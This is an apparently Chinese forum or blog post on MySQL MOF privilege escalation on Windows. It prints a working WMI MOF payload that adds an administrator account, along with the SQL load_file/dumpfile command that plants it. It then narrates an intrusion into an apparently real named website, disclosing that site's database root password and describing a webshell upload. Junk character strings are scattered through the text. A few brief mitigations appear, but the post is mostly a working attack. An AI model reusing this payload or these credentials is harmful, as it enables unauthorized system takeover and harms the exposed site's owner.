Mysql mof扩展漏洞实例与防范

admin

Mysql mof扩展漏洞防范方法
! w  Z$ P, V; k# R+ j
$ M# ?2 ?" ^4 v. Y, h4 s$ ~网上公开的一些利用代码:
" x( m0 i  I( c* Y7 s
#pragma namespace(“\\\\.\\root\\subscription”)
3 I) _+ b# u; m4 N" K
" [' ~, p6 u9 R( z/ [6 h7 Linstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
1 Z+ ?1 `. f6 c' `# z3 K
: p$ j1 [( C6 b/ g( m* h


& `" [' d' B( p8 \0 U  o5 z4 s2 _# {
连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：
) j6 P& O9 o: e8 I8 L
1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数

2、禁止使用”WScript.Shel”组件

3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
$ _  @  l5 w0 l: x& [. d  U& P. G
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
7 ~6 B+ G2 \& N  x1 O
事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权

6 N2 \8 q' W5 V" ^) w7 @+ X/ ]但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容

' V+ B) g" r4 W) m$ v- e# |/ V看懂了后就开始练手吧

8 q: q5 _( b% L  {http://www.webbmw.com/config/config_ucenter.php 一句话 a

9 a9 z% \# R( X& p$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。

于是直接用菜刀开搞
; ^/ @/ i5 d( }, b( t
上马先

( B: E" f# H5 h6 @9 K* Q! q既然有了那些账号 之类的 于是我们就执行吧…….

& Z3 T) R6 o9 ]( O小小的说下
1 u& e  ^8 S1 o$ T2 ]8 ]( e
在这里第1次执行未成功        原因未知

我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
0 [5 c- I" F2 w/ _) W% e2 ^* e* Z
  L( Z# M8 g4 V* `#pragma namespace(“\\\\.\\root\\subscription”)

, E# q+ @7 j( H4 ^+ Z* |0 m8 Minstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
  r) a. J9 r( P5 S1 }8 [
我是将文件放到C:\WINDOWS\temp\1.mof

所以我们就改下执行的代码

select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
; V- d& ^( M. [7 r2 y/ \' W8 t

1 Q  a2 b! {5 p3 `! h- F7 w' }2 E
但是 你会发现账号还是没有躺在那里。。
5 |" Z/ m6 z2 E' D
2 H& C* |, B& Q) W8 W( M: B于是我就感觉蛋疼
, i$ z: W9 i3 B4 m
4 t0 N) Y' V! s2 Z( L4 C就去一个一个去执行 但是执行到第2个 mysql时就成功了………

+ G- t0 ?2 J  Z) K$ _2 e

但是其他库均不成功…

5 c! M' E1 o2 N7 ?& s我就很费解呀 到底为什么不成功求大牛解答…

​

( D9 @4 Z0 j) y2 P+ T. r  l